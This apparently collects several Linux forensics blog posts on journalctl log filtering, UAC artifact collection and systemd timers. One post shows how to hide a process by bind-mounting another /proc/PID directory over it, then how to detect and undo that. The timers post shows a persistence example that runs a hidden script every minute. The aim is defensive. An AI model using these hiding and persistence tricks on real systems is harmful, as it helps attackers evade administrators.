Jul 21 07:22:09 LAB sudo[1432]: pam_unix(sudo:session): session opened for user root(uid=0) by lab(uid=1000)
Jul 21 07:22:09 LAB sudo[1432]:      lab : TTY=pts/0 ; PWD=/home/lab ; USER=root ; COMMAND=/bin/bash
-- Boot 93616c3bb5794e0099520b2bf974d1bc --
Jul 21 07:17:11 LAB sudo[1571]: pam_unix(sudo:session): session closed for user root
Jul 21 07:17:11 LAB sudo[1512]: pam_unix(sudo:session): session closed for user root
[...]

Note that here I am using the “-r” flag so that the most recent entries are shown first, rather than the usual oldest-to-newest ordering you would read in a log file.

The main differences between the default journalctl output and default Syslog-style output are the “Journal begins at...” header line and the markers that show which boot session the log messages were generated in. Like normal Syslog logs, the timestamps are shown in the default time zone for the machine where you are running the journalctl command.

If you want to hide the initial header, specify “-q” (“quiet“). If you want to force UTC timestamps, the option is “--utc“. You can hide the boot session information by choosing any one of several output modes with “-o“. Here is a single log message formatted with some of the different output choices:

-o short
Jul 21 07:33:36 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

-o short-full
Sun 2024-07-21 07:33:36 EDT LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

-o short-iso
2024-07-21T07:33:36-0400 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

-o short-iso-precise
2024-07-21T07:33:36.610329-0400 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2

My personal preference is “-q --utc -o short-iso“. If you have a particular preferred output style, you might consider making it an alias so you’re not constantly having to retype the options. In my case the command would be “alias journalctl='journalctl -q --utc -o short-iso'“.

The “-o” option also supports several different JSON output formats. If you are looking to consume journalctl output with a script, you probably want “-o json” which formats all fields in each journal entry as a single long line of minified JSON. “-o json-pretty” is a multi-line output mode that I find useful when I’m trying to figure out which fields to construct my queries with. The JSON output at the top of this article was created with “-o json-pretty“.

In JSON output modes, you can output a custom list of fields with the “--output-fields=” option:

# journalctl -o json-pretty --output-fields=_EXE,_PID,MESSAGE
{
        "_EXE" : "/usr/sbin/sshd",
        "__REALTIME_TIMESTAMP" : "1721561616611216",
        "MESSAGE" : "Accepted password for lab from 192.168.10.1 port 56282 ssh2",
        "_BOOT_ID" : "5c57e83c3abd457c95d0695807667c9e",
        "__CURSOR" : "s=743db8433dcc46ca9b9cecd7a4272061;i=1e19;b=5c57e83c3abd457c95d0695807667c9e;m=3935b8a5;t=61dc04c9df790;x=d031b64e57796135",
        "_PID" : "1478",
        "__MONOTONIC_TIMESTAMP" : "959821989"
}
[...]

Notice that the __CURSOR, __REALTIME_TIMESTAMP, __MONOTONIC_TIMESTAMP, and _BOOT_ID fields are always printed even though we did not specifically select them.

“-o verbose --output-fields=...” gives only the requested fields plus __CURSOR but does so without the JSON formatting. “-o cat --output-fields=...” gives just the field values with no field names and no extra fields.

MATCHING MESSAGES

In general you can select messages you want to see by matching with “FIELD=value“, e.g. “_UID=1000“. You can specify multiple selectors on the same command line and the journalctl command assumes you want to logically “AND” the selections together (intersection). If you want logical “OR”, use a “+” between field selections, e.g. “_UID=0 + _UID=1000“.
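
For example, combining two of the fields from the JSON output at the top of this article to select messages logged by the sshd binary running as root:

# journalctl -q --utc -o short-iso _EXE=/usr/sbin/sshd _UID=0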

Earlier I mentioned using “-o json-pretty” to help view fields that you might want to match on. “journalctl -N” lists the names of all fields found in the journal file(s), while “journalctl -F FIELD” lists all values found for a particular field:

# journalctl -N | sort
[...]
_SYSTEMD_UNIT
_SYSTEMD_USER_SLICE
_SYSTEMD_USER_UNIT
THREAD_ID
TID
TIMESTAMP_BOOTTIME
TIMESTAMP_MONOTONIC
_TRANSPORT
_UDEV_DEVNODE
_UDEV_SYSNAME
_UID
UNIT
UNIT_RESULT
USER_ID
USER_INVOCATION_ID
USERSPACE_USEC
USER_UNIT
# journalctl -F _UID | sort -n
0
101
104
105
107
110
114
117
1000
62803

Piping the output of “-F” and “-N” into sort is highly recommended.

Commonly matched fields have shortcut options:

--facility=   Matches on Syslog facility name or number
    journalctl -q -o short --facility=authpriv
    (Gives output just like typical /var/log/auth.log files)

-t            Matches SYSLOG_IDENTIFIER field
    journalctl -q -o short -t sudo
    (When you just want to see messages from Sudo)

-u            Matches _SYSTEMD_UNIT field
    journalctl -q -o short -u ssh.service
    (Messages from sshd, the ".service" is optional)

You can also do pattern matching against the log message text using the “-g” (“grep“) option. This option uses PCRE2 regular expression syntax. You might find this regular expression tester useful.

Options can be combined in any order:

# journalctl -q -r --utc -o short-iso -u ssh -g Accepted
2024-07-21T11:33:36+0000 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2
2024-07-21T11:22:02+0000 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2
2024-07-20T21:55:45+0000 LAB sshd[1559]: Accepted password for lab from 192.168.10.1 port 56278 ssh2
2024-07-20T21:44:55+0000 LAB sshd[1386]: Accepted password for lab from 192.168.10.1 port 56376 ssh2
[...]

TIME-BASED SELECTIONS

Specify time ranges with the “-S” (or “--since“) and “-U” (“--until“) options. The syntax for specifying dates and times is ridiculously flexible and is defined in the systemd.time(7) manual page. Here are some examples:

-S “2024-08-07 09:30:00”
-S 2024-07-24
-U yesterday
-U “15 minutes ago”
-S -1hr
-S 2024-07-24 -U yesterday

The Systemd journal also keeps track of when the system reboots and allows you to select messages that happened during a particular operating session of the machine. “--list-boots” gives a list of all of the reboots found in the current journal files and “-b” allows you to select one or more sessions:

# journalctl --list-boots
 -3 f366a96b2f0a402a94e02eb57e10d431 Sun 2024-07-14 16:18:40 EDT—Thu 2024-07-18 08:53:12 EDT
 -2 9ac272cac6c040a7b9ad021ba32c2574 Thu 2024-07-18 08:53:45 EDT—Sat 2024-07-20 08:55:50 EDT
 -1 93616c3bb5794e0099520b2bf974d1bc Sat 2024-07-20 17:41:24 EDT—Sun 2024-07-21 07:17:12 EDT
  0 5c57e83c3abd457c95d0695807667c9e Sun 2024-07-21 07:17:40 EDT—Sun 2024-07-21 14:17:52 EDT
# journalctl -q -r --utc -o short-iso -u ssh -g Accepted -b -1
2024-07-20T21:55:45+0000 LAB sshd[1559]: Accepted password for lab from 192.168.10.1 port 56278 ssh2
2024-07-20T21:44:55+0000 LAB sshd[1386]: Accepted password for lab from 192.168.10.1 port 56376 ssh2

TAIL-LIKE BEHAVIORS

When using journalctl on a live system, “journalctl -f” allows you to watch messages coming into the logs in real time. This is similar to using “tail -f” on a traditional Syslog-style log. You may still use all of the normal selectors to filter messages you want to watch for, as well as specify the usual output formats.

“journalctl -n” displays the last ten entries in the journal, similar to piping the output into tail. You may optionally specify a numeric argument after “-n” if you want to see more or fewer than ten lines.

However, the “-n” and “-g” (pattern matching) options have a strange interaction. The pattern match is only applied to the lines selected by “-n” along with your other selectors. For example, we can extract the last ten lines associated with the SSH service:

# journalctl -q --utc -o short-iso -u ssh -n
2024-07-21T11:17:41+0000 LAB systemd[1]: Starting OpenBSD Secure Shell server...
2024-07-21T11:17:42+0000 LAB sshd[723]: Server listening on 0.0.0.0 port 22.
2024-07-21T11:17:42+0000 LAB sshd[723]: Server listening on :: port 22.
2024-07-21T11:17:42+0000 LAB systemd[1]: Started OpenBSD Secure Shell server.
2024-07-21T11:22:02+0000 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2
2024-07-21T11:22:02+0000 LAB sshd[1304]: pam_unix(sshd:session): session opened for user lab(uid=1000) by (uid=0)
2024-07-21T11:33:36+0000 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2
2024-07-21T11:33:36+0000 LAB sshd[1478]: pam_unix(sshd:session): session opened for user lab(uid=1000) by (uid=0)
2024-07-21T19:56:09+0000 LAB sshd[4013]: Accepted password for lab from 192.168.10.1 port 56284 ssh2
2024-07-21T19:56:09+0000 LAB sshd[4013]: pam_unix(sshd:session): session opened for user lab(uid=1000) by (uid=0)

But matching the lines containing the “Accepted” keyword only matches against the ten lines shown above:

# journalctl -q --utc -o short-iso -u ssh -g Accepted -n
2024-07-21T11:22:02+0000 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2
2024-07-21T11:33:36+0000 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2
2024-07-21T19:56:09+0000 LAB sshd[4013]: Accepted password for lab from 192.168.10.1 port 56284 ssh2

From an efficiency perspective I understand this choice. It’s costly to seek backwards through the journal doing pattern matches until you find ten lines that match your regular expression. But it’s certainly surprising behavior, especially when your pattern match returns zero matching lines because it doesn’t happen to get a hit in the last ten lines you selected.

Frankly, I just forget about the “-n” option and pipe my journalctl output into tail.
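
That way the pattern match runs over the entire journal and tail just trims the result:

# journalctl -q --utc -o short-iso -u ssh -g Accepted | tail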

Further Reading

I’ve attempted to summarize the information most important to DFIR professionals, but there is always more to know. For further information, start with the journalctl(1) manual page. Keep your journalctl cheat sheet handy and good luck out there!

Hiding Linux Processes with Bind Mounts

Lately I’ve been thinking about Stephan Berger’s recent blog post on hiding Linux processes with bind mounts. Bottom line here is that if you have an evil process you want to hide, use a bind mount to mount a different directory on top of the /proc/PID directory for the evil process.

In the original article, Stephan uses a nearly empty directory to overlay the original /proc/PID directory for the process he is hiding. I started thinking about how I could write a tool that would populate a more realistic looking spoofed directory. But after doing some prototypes and running into annoying complexities I realized there is a much easier approach.

Why try and make my own spoofed directory when I can simply use an existing /proc/PID directory from some other process? If you look at typical Linux ps output, there are lots of process entries that would hide our evil process quite well:

root@LAB:~# ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 Jul23 ?        00:00:12 /sbin/init
root           2       0  0 Jul23 ?        00:00:00 [kthreadd]
root           3       2  0 Jul23 ?        00:00:00 [rcu_gp]
root           4       2  0 Jul23 ?        00:00:00 [rcu_par_gp]
[...]
root          73       2  0 Jul23 ?        00:00:00 [irq/24-pciehp]
root          74       2  0 Jul23 ?        00:00:00 [irq/25-pciehp]
root          75       2  0 Jul23 ?        00:00:00 [irq/26-pciehp]
root          76       2  0 Jul23 ?        00:00:00 [irq/27-pciehp]
root          77       2  0 Jul23 ?        00:00:00 [irq/28-pciehp]
root          78       2  0 Jul23 ?        00:00:00 [irq/29-pciehp]
root          79       2  0 Jul23 ?        00:00:00 [irq/30-pciehp]

These process entries with low PIDs and process names in square brackets (“[somename]“) are spontaneous processes. They aren’t running executables in the traditional sense– you won’t find a binary in your operating system called kthreadd for example. Instead, these are essentially kernel code dressed up to look like a process so administrators can monitor various subsystems using familiar tools like ps.

From our perspective, however, they’re a bunch of processes that administrators generally ignore and which have names that vary only slightly from one another. They’re perfect for hiding our evil processes:

root@LAB:~# ps -ef | grep myevilprocess
root        4867       1  0 Jul23 pts/0    00:00:16 myevilprocess
root@LAB:~# mount -B /proc/78 /proc/4867
root@LAB:~# ps -ef | grep 4867

Our evil process is now completely hidden. If somebody were to look closely at the ps output, they would discover there are now two entries for PID 78:

root@LAB:~# ps -ef | awk '$2 == 78'
root          78       2  0 Jul23 ?        00:00:00 [irq/29-pciehp]
root          78       2  0 Jul23 ?        00:00:00 [irq/29-pciehp]

My guess is that nobody is going to notice this unless they are specifically looking for this technique. And if they are aware of this technique, there’s a much simpler way of detecting it which Stephan notes in his original article:

root@LAB:~# cat /proc/mounts | grep /proc
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=424 0 0
proc /proc/4867 proc rw,nosuid,nodev,noexec,relatime 0 0

The last line above is a dead giveaway that something hinky is going on.

We can refine Stephan’s approach:

root@LAB:~# cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur
/proc/4867

Just to be thorough, I’m dumping the contents of all of the /proc/*/mounts files (/proc/mounts is a link to /proc/self/mounts) and looking for entries where the mount point is a /proc/PID directory or one of its subdirectories. The “sort -ur” at the end gives us one instance of each unique mount point.

But why the “-r” option? I want to use my output to programmatically unmount the bind mounted directories. I was worried about somebody doing a bind mount on top of a bind mount:

root@LAB:~# mount -B /proc/79/fd /proc/4867/fd
root@LAB:~# cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur
/proc/78/fd
/proc/4867/fd
/proc/4867
root@LAB:~# cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur | 
    while read dir; do umount $dir; done
umount: /proc/4867/fd: not mounted.
root@LAB:~# ps -ef | grep myevilprocess
root        4867       1  0 Jul23 pts/0    00:00:16 myevilprocess

While I think this scenario is extremely unlikely, using “sort -ur” means that the mount points are returned in the proper order to be unmounted. And once the bind mounts are unmounted, we can see the evil process again.

Note that we do get an error here. /proc/78 is mounted on top of /proc/4867. So when we unmount /proc/78/fd we are also taking care of the spoofed path /proc/4867/fd. When our while loop gets to the entry for /proc/4867/fd, the umount command errors out.

Possible weird corner cases aside, let’s try and provide our analyst with some additional information:

root@LAB:~# function procbindmounts {
  cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur | 
    while read dir; do 
        echo ===== POSSIBLE PROCESS HIDING $dir
        echo -ne Overlay:\\t
        cut -d' ' -f1-7 $dir/stat
        umount $dir
        echo -ne Hidden:\\t\\t
        cut -d' ' -f1-7 $dir/stat
    done
}
root@LAB:~# mount -B /proc/78 /proc/4867
root@LAB:~# procbindmounts
===== POSSIBLE PROCESS HIDING /proc/4867
Overlay:        78 (irq/29-pciehp) S 2 0 0 0
Hidden:         4867 (myevilprocess) S 1 4867 4759 34816

Thanks Stephan for getting my creative juices flowing. This is a fun technique for all you red teamers out there, and a good trick for all you blue team analysts.

Working With UAC

In my last blog post, I covered Systemd timers and some of the forensic artifacts associated with them. I’m also a fan of Thiago Canozzo Lahr’s UAC tool for collecting artifacts during incident response. So I wanted to add the Systemd timer artifacts covered in my blog post to UAC. And it occurred to me that others might be interested in seeing how to modify UAC to add new artifacts for their own purposes.

UAC is a module-driven tool for collecting artifacts from Unix-like systems (including Macs). The user specifies a profile file containing the list of artifacts they want to collect and an output directory where that collection should occur. Individual artifacts may be added to or excluded from the list of artifacts in the profile file using individual command line arguments.

A typical UAC command might look like:

./uac -p ir_triage -a memory_dump/avml.yaml /root

Here we are selecting the standard ir_triage profile included with UAC (“-p ir_triage“) and adding a memory dump (“-a memory_dump/avml.yaml“) to the list of artifacts to be collected. Output will be collected in the /root directory.

UAC’s configuration files are simple YAML files that can easily be customized and modified to fit your needs. Adding new artifacts usually means adding a few lines to existing configuration files, or more rarely creating a new configuration module from scratch. I’m going to walk through a few examples, including showing you how I added the Systemd timer artifacts to UAC.

Before we get started, let’s go ahead and check out the latest version from Thiago’s Github:

$ git clone https://github.com/tclahr/uac.git
Cloning into 'uac'...
remote: Enumerating objects: 5184, done.
remote: Counting objects: 100% (943/943), done.
remote: Compressing objects: 100% (284/284), done.
remote: Total 5184 (delta 661), reused 857 (delta 630), pack-reused 4241
Receiving objects: 100% (5184/5184), 32.29 MiB | 26.11 MiB/s, done.
Resolving deltas: 100% (3481/3481), done.
$ cd uac
$ ls
artifacts bin CHANGELOG.md CODE_OF_CONDUCT.md config CONTRIBUTING.md DCO-1.1.txt lib LICENSE LICENSES.md MAINTAINERS.md profiles README.md tools uac

The profiles directory contains the YAML-formatted profile files, including the ir_triage.yaml profile I referenced in my sample UAC command above:

$ ls profiles/
full.yaml  ir_triage.yaml  offline.yaml

The artifacts directory is an entire hierarchy of dozens of YAML files describing how to collect artifacts:

$ ls artifacts/
bodyfile  chkrootkit  files  hash_executables  live_response  memory_dump
$ ls artifacts/memory_dump/
avml.yaml  process_memory_sections_strings.yaml  process_memory_strings.yaml

Modifying Profiles

While the default profiles that come with UAC are excellent starting points, you will often find yourself needing to tweak the list of artifacts you wish to collect. This can be done with the “-a” command line argument as noted above. But if you find yourself collecting the same custom list of artifacts over and over, it becomes easier to create your own profile file with your specific list of desired artifacts.

For example, let’s suppose we were satisfied with the basic list of artifacts in the ir_triage profile, but wanted to make sure we always tried to collect a memory image. Rather than adding “-a memory_dump/avml.yaml” to every UAC command, we could create a modified version of the ir_triage profile that simply includes this artifact.

First make a copy of the ir_triage profile under a new name:

$ cp profiles/ir_triage.yaml profiles/ir_triage_memory.yaml

Now edit the ir_triage_memory.yaml file, updating the “name:” line and adding the “memory_dump/avml.yaml” artifact as shown below:

name: ir_triage_memory
description: Incident response triage collection.
artifacts:
  - memory_dump/avml.yaml
  - live_response/process/ps.yaml
  - live_response/process/lsof.yaml
  - live_response/process/top.yaml
  - live_response/process/procfs_information.yaml
[... snip ...]

You can see where we added the “memory_dump/avml.yaml” artifact right at the top of the list of artifacts to collect. It is also extremely important to modify the “name:” line at the top of the file so that this name matches the name of the YAML file for the profile (without the “.yaml” extension). UAC will exit with an error if the “name:” line doesn’t match the base name of the profile file you are trying to use.

Now that we have our new profile file, we can invoke it as “./uac -p ir_triage_memory /root“.

Adding Artifacts

To add specific artifacts, you will need to get into the YAML files under the “artifacts” directory. In my previous blog posting, I suggested collecting the output of “systemctl list-timers --all” and “systemctl status *.timer”. You’ll often be surprised to find that UAC is already collecting the artifact you are looking for:

$ grep -rl systemctl artifacts
artifacts/live_response/system/systemctl.yaml

Here is the original systemctl.yaml file:

version: 1.0
artifacts:
  -
    description: Display all systemd system units.
    supported_os: [linux]
    collector: command
    command: systemctl list-units
    output_file: systemctl_list-units.txt
  -
    description: Display timer units currently in memory, ordered by the time they elapse next.
    supported_os: [linux]
    collector: command
    command: systemctl list-timers --all
    output_file: systemctl_list-timers_--all.txt
  -
    description: Display unit files installed on the system, in combination with their enablement state (as reported by is-enabled).
    supported_os: [linux]
    collector: command
    command: systemctl list-unit-files
    output_file: systemctl_list-unit-files.txt

It looks like “systemctl list-timers --all” is already being collected. Following the pattern of the other entries, it’s easy to add in the configuration to collect “systemctl status *.timer”:

version: 1.1
artifacts:
  -
    description: Display all systemd system units.
    supported_os: [linux]
    collector: command
    command: systemctl list-units
    output_file: systemctl_list-units.txt
  -
    description: Display timer units currently in memory, ordered by the time they elapse next.
    supported_os: [linux]
    collector: command
    command: systemctl list-timers --all
    output_file: systemctl_list-timers_--all.txt
  -
    description: Get status from all timers, including logs
    supported_os: [linux]
    collector: command
    command: systemctl status *.timer
    output_file: systemctl_status_timer.txt
  -
    description: Display unit files installed on the system, in combination with their enablement state (as reported by is-enabled).
    supported_os: [linux]
    collector: command
    command: systemctl list-unit-files
    output_file: systemctl_list-unit-files.txt

Note that I was careful to update the “version:” line at the top of the file to reflect the fact that the file was changing.

As far as the various file artifacts we need to collect, I discovered that artifacts/files/system/systemd.yaml was already collecting many of the files we want:

version: 2.0
artifacts:
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /usr/lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd sessions files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/sessions
    file_type: f
  -
    description: Collect systemd scope and transient timer files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/transient
    name_pattern: ["*.scope"]

I just needed to add some configuration to collect transient timer files and per-user configuration files:

version: 2.1
artifacts:
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /usr/lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd sessions files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/sessions
    file_type: f
  -
    description: Collect systemd scope and transient timer files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/transient
    name_pattern: ["*.scope", "*.timer", "*.service"]
  -
    description: Collect systemd per-user transient timers.
    supported_os: [linux]
    collector: file
    path: /run/user/*/systemd/transient
    name_pattern: ["*.timer", "*.service"]
  -
    description: Collect systemd per-user configuration.
    supported_os: [linux]
    collector: file
    path: /%user_home%/.config/systemd

The full artifact configuration syntax is described in the UAC documentation.

But what if I made a mistake in my syntax? Happily, UAC includes a “--validate-artifacts-file” switch to check for errors:

$ ./uac --validate-artifacts-file ./artifacts/live_response/system/systemctl.yaml
uac: artifacts file './artifacts/live_response/system/systemctl.yaml' successfully validated.
$ ./uac --validate-artifacts-file ./artifacts/files/system/systemd.yaml
uac: artifacts file './artifacts/files/system/systemd.yaml' successfully validated.

In this case my changes only involved modifying existing artifacts files. If I had found it necessary to create new YAML files I would have also needed to add those new artifact files to my preferred UAC profile.
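
Had I gone that route, the workflow would look something like the hypothetical sketch below. The artifact file name my_timers.yaml is made up for illustration; the uac switches are the same ones shown above:

$ vi artifacts/live_response/system/my_timers.yaml       # create the new artifact definitions
$ ./uac --validate-artifacts-file ./artifacts/live_response/system/my_timers.yaml
$ vi profiles/ir_triage_memory.yaml                      # add "- live_response/system/my_timers.yaml" under "artifacts:"
$ ./uac -p ir_triage_memory /root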

Sharing is Caring

If you add new artifacts to your local copy of UAC, please consider contributing them back to the project. The process for submitting a pull request is documented in the CONTRIBUTING.md document.

Systemd Timers

You know what Linux needs? Another task scheduling system!

said nobody ever

Important Artifacts

Command output:

  • systemctl list-timers --all
  • systemctl status *.timer

File locations:

  • /usr/lib/systemd/system/*.{timer,service}
  • /etc/systemd/system
  • $HOME/.config/systemd
  • [/var]/run/systemd/transient/*.{timer,service}
  • [/var]/run/user/*/systemd/transient/*.{timer,service}

Also: Syslog messages sent to the LOG_CRON facility.

The Basics

If you’ve been busy trying to get actual work done on your Linux systems, you may have missed the fact that Systemd’s ongoing scope creep now includes timers. Systemd timers are a task scheduling system that provides functionality similar to the existing cron (Vixie cron and anacron) and atd systems in Linux. That gives attackers yet another mechanism to leverage for malware activation and persistence.

Systemd timers provide both ongoing scheduled tasks similar to cron jobs (what the Systemd documentation calls realtime timers) and one-shot scheduled tasks (monotonic timers) similar to atd-style jobs. Standard Systemd timers are configured via two files: a *.timer file and a *.service file. These files must live in standard Systemd configuration directories like /usr/lib/systemd/system or /etc/systemd/system.

The *.timer file generally contains information about when and how the scheduled task will run. Here’s an example from the logrotate.timer file on my local Debian system:

[Unit]
Description=Daily rotation of log files
Documentation=man:logrotate(8) man:logrotate.conf(5)

[Timer]
OnCalendar=daily
AccuracySec=1h
Persistent=true

[Install]
WantedBy=timers.target

This timer is configured to run daily, within a one-hour window (AccuracySec=1h), at whatever point Systemd deems most efficient. Persistent=true means that the last time the timer ran is tracked on disk. If the system was asleep or powered off during a period when this timer should have been activated, the timer will run immediately on the next wakeup or boot. This is similar to the functionality of the traditional Anacron system in Linux.
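
A useful aside for investigators: on the systemd versions I have looked at, that on-disk tracking takes the form of zero-length “stamp” files whose mtime records the last activation. Verify the path on your target system, but it is typically:

# File mtimes record the last time each Persistent=true timer fired
ls -l /var/lib/systemd/timers/
stat -c '%y %n' /var/lib/systemd/timers/stamp-*.timer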

The *.timer file may include a Unit= directive that specifies a *.service file to execute when the timer fires. However, most *.timer files, including this one, omit the Unit= directive, which means the timer will activate the *.service unit with the same base name (here, logrotate.service). The *.service file configures the program(s) the timer executes, along with other job parameters and security settings. Here’s the logrotate.service file from my Debian machine:

[Unit]
Description=Rotate log files
Documentation=man:logrotate(8) man:logrotate.conf(5)
RequiresMountsFor=/var/log
ConditionACPower=true

[Service]
Type=oneshot
ExecStart=/usr/sbin/logrotate /etc/logrotate.conf

# performance options
Nice=19
IOSchedulingClass=best-effort
IOSchedulingPriority=7

# hardening options
#  details: https://www.freedesktop.org/software/systemd/man/systemd.exec.html
#  no ProtectHome for userdir logs
#  no PrivateNetwork for mail deliviery
#  no NoNewPrivileges for third party rotate scripts
#  no RestrictSUIDSGID for creating setgid directories
LockPersonality=true
MemoryDenyWriteExecute=true
PrivateDevices=true
PrivateTmp=true
ProtectClock=true
ProtectControlGroups=true
ProtectHostname=true
ProtectKernelLogs=true
ProtectKernelModules=true
ProtectKernelTunables=true
ProtectSystem=full
RestrictNamespaces=true
RestrictRealtime=true

Timers can be activated using the typical systemctl command line interface:

# systemctl enable logrotate.timer
Created symlink /etc/systemd/system/timers.target.wants/logrotate.timer → /lib/systemd/system/logrotate.timer.
# systemctl start logrotate.timer

systemctl enable ensures the timer will be reactivated across reboots while systemctl start ensures that the timer is started in the current OS session.
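
When you are checking a specific timer during an investigation, two standard systemctl queries answer the reboot-persistence and currently-armed questions directly:

systemctl is-enabled logrotate.timer    # "enabled" means it will come back after a reboot
systemctl is-active logrotate.timer     # "active" means it is armed in the current session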

You can get a list of all timers configured on the system (active or not) with systemctl list-timers --all:

# systemctl list-timers --all
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2024-05-05 18:33:46 UTC 1h 1min left Sun 2024-05-05 17:30:29 UTC 1min 58s ago anacron.timer anacron.service
Sun 2024-05-05 19:50:01 UTC 2h 17min left Sun 2024-05-05 16:37:36 UTC 54min ago apt-daily.timer apt-daily.service
Mon 2024-05-06 00:00:00 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago exim4-base.timer exim4-base.service
Mon 2024-05-06 00:00:00 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago logrotate.timer logrotate.service
Mon 2024-05-06 00:00:00 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago man-db.timer man-db.service
Mon 2024-05-06 00:17:20 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago fwupd-refresh.timer fwupd-refresh.service
Mon 2024-05-06 01:13:52 UTC 7h left Sun 2024-05-05 16:37:36 UTC 54min ago fstrim.timer fstrim.service
Mon 2024-05-06 03:23:47 UTC 9h left Fri 2024-04-19 00:59:27 UTC 2 weeks 2 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2024-05-06 06:02:06 UTC 12h left Sun 2024-05-05 16:37:36 UTC 54min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sun 2024-05-12 03:10:20 UTC 6 days left Sun 2024-05-05 16:37:36 UTC 54min ago e2scrub_all.timer e2scrub_all.service

10 timers listed.

systemctl status can give you details about a specific timer, including the full path to where the *.timer file lives and any related log output:

# systemctl status logrotate.timer
● logrotate.timer - Daily rotation of log files
     Loaded: loaded (/lib/systemd/system/logrotate.timer; enabled; vendor preset: enabled)
     Active: active (waiting) since Thu 2024-04-18 00:44:25 UTC; 2 weeks 3 days ago
    Trigger: Mon 2024-05-06 00:00:00 UTC; 6h left
   Triggers: ● logrotate.service
       Docs: man:logrotate(8)
             man:logrotate.conf(5)

Apr 18 00:44:25 LAB systemd[1]: Started Daily rotation of log files.

Note that systemctl status *.timer will give this output for all timers on the system. This would be appropriate if you are quickly trying to gather this information for later triage.

If the command triggered by your timer produces output, look for that output with systemctl status <yourtimer>.service. For example:

# systemctl status anacron.service
● anacron.service - Run anacron jobs
     Loaded: loaded (/lib/systemd/system/anacron.service; enabled; vendor preset: enabled)
     Active: inactive (dead) since Sun 2024-05-05 18:34:45 UTC; 28min ago
TriggeredBy: ● anacron.timer
       Docs: man:anacron
             man:anacrontab
    Process: 1563 ExecStart=/usr/sbin/anacron -d -q $ANACRON_ARGS (code=exited, status=0/SUCCESS)
   Main PID: 1563 (code=exited, status=0/SUCCESS)
        CPU: 2ms

May 05 18:34:45 LAB systemd[1]: Started Run anacron jobs.
May 05 18:34:45 LAB systemd[1]: anacron.service: Succeeded.

Systemd timer executions and command output are also logged to the LOG_CRON Syslog facility.
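
On journald systems those messages can be pulled straight from the journal; on systems running a traditional syslog daemon, check wherever the cron facility is routed (commonly /var/log/cron or /var/log/syslog, depending on the distribution). For example:

journalctl SYSLOG_FACILITY=9 --since today            # syslog facility 9 is LOG_CRON
journalctl -u logrotate.timer -u logrotate.service    # or query the units directly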

Transient Timers

Timers can be created on-the-fly without explicit *.timer and *.service files using the systemd-run command:

# systemd-run --on-calendar='*-*-* *:*:15' /tmp/.evil-lair/myStartUp.sh
Running timer as unit: run-rb68ce3d3c11a4ec79b508036776d2cb1.timer
Will run service as unit: run-rb68ce3d3c11a4ec79b508036776d2cb1.service

In this case, we are creating a timer that will run every minute of every hour of every day at 15 seconds into the minute. The timer will execute /tmp/.evil-lair/myStartUp.sh. Note that the systemd-run command requires that /tmp/.evil-lair/myStartUp.sh exist and be executable.
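
If you are ever unsure how an OnCalendar expression will behave, systemd-analyze will parse it and show the next elapse time:

systemd-analyze calendar '*-*-* *:*:15'    # prints the normalized expression and next elapse time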

The run-*.timer and run-*.service files end up in [/var]/run/systemd/transient:

# cd /run/systemd/transient/
# ls
run-rb68ce3d3c11a4ec79b508036776d2cb1.service  run-rb68ce3d3c11a4ec79b508036776d2cb1.timer  session-2.scope  session-71.scope  session-c1.scope
# cat run-rb68ce3d3c11a4ec79b508036776d2cb1.timer
# This is a transient unit file, created programmatically via the systemd API. Do not edit.
[Unit]
Description=/tmp/.evil-lair/myStartUp.sh

[Timer]
OnCalendar=*-*-* *:*:15
RemainAfterElapse=no
# cat run-rb68ce3d3c11a4ec79b508036776d2cb1.service
# This is a transient unit file, created programmatically via the systemd API. Do not edit.
[Unit]
Description=/tmp/.evil-lair/myStartUp.sh

[Service]
ExecStart="/tmp/.evil-lair/myStartUp.sh"

These transient timers can be monitored with systemctl list-timers and systemctl status just like any other timer:

# systemctl list-timers --all -l
NEXT                        LEFT          LAST                        PASSED             UNIT                                        ACTIVATES
Sun 2024-05-05 17:59:15 UTC 17s left      Sun 2024-05-05 17:58:19 UTC 37s ago            run-rb68ce3d3c11a4ec79b508036776d2cb1.timer run-rb68ce3d3c11a4ec79b508036776d2cb1.service
